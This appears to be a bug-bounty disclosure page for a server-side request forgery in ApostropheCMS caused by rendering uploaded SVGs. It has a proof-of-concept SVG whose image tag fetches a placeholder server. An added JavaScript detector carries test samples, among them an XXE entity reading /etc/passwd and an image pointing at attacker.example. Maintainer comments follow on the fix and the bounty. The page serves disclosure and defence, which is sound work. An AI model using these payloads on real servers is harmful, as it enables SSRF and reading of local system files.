Server-Side Request Forgery (SSRF) in apostrophecms/apostrophe

Valid

Reported on Aug 17th 2021

✍️ Description

Rendering of an SVG file causes SSRF

🕵️‍♂️ Proof of Concept

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<!-- external xlink:href: a server-side renderer that dereferences it fetches this URL on the attacker's behalf -->
<image height="200" width="200" xlink:href="http://<EXAMPLE_SERVER>/image.jpeg" />
</svg>

Upload the SVG file with the payload above (changing the server name) and preview it. Then check the server for an incoming request.

💥 Impact

Basic SSRF attack -> host redirect; further research into this attack may lead to XXE.
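The request in the PoC above is issued because whatever renders or previews the SVG on the server dereferences `xlink:href`. One way to close that at upload time is to refuse any SVG that carries an external reference, which also catches the DTD and entity markup that the impact note points at. The block below is an added example written for this page; it is not the Apostrophe project's code and not the fix in the linked pull request. It is dependency-free and tokenises tags and attributes with regular expressions rather than a full XML parser, so it is a gate in front of the renderer, not a sanitiser. The sample SVGs are constructed here; the first is this report's PoC with its `<EXAMPLE_SERVER>` placeholder kept, and `attacker.example` is a made-up host.

```javascript
// Upload-time gate for SVG files that refuses any document able to make the
// renderer reach out over the network. Example code written for this page,
// not the Apostrophe project's own fix. Dependency-free: tags and attributes
// are tokenised with regular expressions, not a full XML parser.

// Schemes (plus the protocol-relative form) that cause a network fetch.
const REMOTE_SCHEME = /^\s*(?:https?:|ftp:|file:|\/\/)/i;

// Attributes that carry a resource reference on <image>, <use>, <a>, <script>, ...
const REF_ATTRS = new Set(['href', 'xlink:href', 'src']);

// Decode numeric character references and the five XML-predefined entities so
// that a scheme written as h&#x74;tp: cannot slip past REMOTE_SCHEME.
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
function decodeEntities(value) {
  return value
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&(amp|lt|gt|quot|apos);/g, (_, n) => NAMED[n]);
}

// Returns one finding per problem; an empty array means nothing external was seen.
function findExternalReferences(svgText) {
  const findings = [];

  // 1. Markup that is dangerous regardless of attribute values.
  if (/<!(?:DOCTYPE|ENTITY)[\s>\[]/i.test(svgText)) {
    findings.push({ kind: 'doctype-or-entity', detail: 'DTD present (XXE surface)' });
  }
  if (/<\?xml-stylesheet\b/i.test(svgText)) {
    findings.push({ kind: 'processing-instruction', detail: 'xml-stylesheet can pull a remote stylesheet' });
  }

  // 2. url(...) and @import in style attributes or <style> bodies also fetch.
  const cssRe = /(?:url\(\s*['"]?|@import\s+['"])([^'")]+)/gi;
  let css;
  while ((css = cssRe.exec(svgText)) !== null) {
    const target = decodeEntities(css[1]);
    if (REMOTE_SCHEME.test(target)) {
      findings.push({ kind: 'remote-reference', element: 'css', attribute: 'url', value: target.trim() });
    }
  }

  // 3. Walk every start tag; quoted attribute values may legally contain '>'.
  const tagRe = /<([A-Za-z_:][\w:.-]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>/g;
  let tag;
  while ((tag = tagRe.exec(svgText)) !== null) {
    const element = tag[1].toLowerCase();
    if (element === 'script' || element === 'foreignobject') {
      findings.push({ kind: 'active-content', element, detail: `<${element}> element` });
    }
    const attrRe = /([^\s=]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      const attribute = attr[1].toLowerCase();
      const value = decodeEntities(attr[2] !== undefined ? attr[2] : attr[3]);
      if (REF_ATTRS.has(attribute) && REMOTE_SCHEME.test(value)) {
        findings.push({ kind: 'remote-reference', element, attribute, value: value.trim() });
      } else if (attribute.startsWith('on')) {
        findings.push({ kind: 'active-content', element, attribute, detail: 'event handler' });
      }
    }
  }
  return findings;
}

function isSafeSvg(svgText) {
  return findExternalReferences(svgText).length === 0;
}

// Constructed samples. POC_SVG is the PoC from this report with its placeholder kept;
// attacker.example is a made-up host.
const POC_SVG = `<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image height="200" width="200" xlink:href="http://<EXAMPLE_SERVER>/image.jpeg" />
</svg>`;
const CLEAN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs><linearGradient id="g"/><circle id="dot" r="4"/></defs>
<rect width="10" height="10" fill="url(#g)"/><use xlink:href="#dot"/>
</svg>`;
const ENCODED_SVG = `<svg xmlns="http://www.w3.org/2000/svg"><image href="h&#x74;tp://attacker.example/x.png"/></svg>`;
const XXE_SVG = `<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><svg xmlns="http://www.w3.org/2000/svg">&xxe;</svg>`;

console.log(JSON.stringify(findExternalReferences(POC_SVG), null, 2));
```

The policy is deliberately blunt: anything that is not a fragment reference (`#id`) is refused, because a preview pipeline has no legitimate reason to fetch a remote image on an upload. A scanner like this is a first line only; the renderer itself should run without network access (or rasterise in a sandbox), since a tokenizer can be fooled by markup a real XML parser would still accept, for example an external reference introduced through a parameter entity that this code only flags because the DTD is present at all.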

We have contacted a member of the apostrophecms/apostrophe team and are waiting to hear back 2 years ago
Alex Bea validated this vulnerability 2 years ago
Ajmal Aboobacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
Tom Boutell
2 years ago
Maintainer

This has been fixed by the core team in version 3.4.0.

Tom Boutell
2 years ago
Maintainer

Thank you for reporting it.

Tom Boutell
2 years ago
Maintainer

( I can't report this fixed via the menus because there's no provision there for a fix that was already released in the main branch and no longer exists in a separate branch. Here's a link to the code change though: https://github.com/apostrophecms/apostrophe/pull/3394 )

Tom Boutell
2 years ago
Maintainer

Ah, I was able to confirm it fixed on another report.

Tom Boutell marked this as fixed with commit c8b94e 2 years ago
Tom Boutell has been awarded the fix bounty
This vulnerability will not receive a CVE
0x9x
2 years ago

Nice! But the SVG file upload issue has already been fixed!?

Tom Boutell
2 years ago
Maintainer

Yes, by me (I'm on the core team). If I double-claimed the bounty on another ticket somewhere then some admin should probably revoke one of them and that's fine — I'm just trying to keep folks updated on whether these issues are still in play.

Tom Boutell
2 years ago
Maintainer

(Don't really care about the bounty personally or know what the policy is on that, just want it clear what's been fixed)

0x9x
2 years ago

This report is a duplicate of another! Link --> https://www.huntr.dev/bounties/418f3867-d3b3-4fc7-bcdf-400cf86e7123/

If I wanted to demonstrate it with an SSRF scenario, I would do this.

Tom Boutell
2 years ago
Maintainer

As stated on that ticket you linked to this has already been fixed. If you can still do it on our public demo please provide complete instructions to reproduce that here. Thank you.
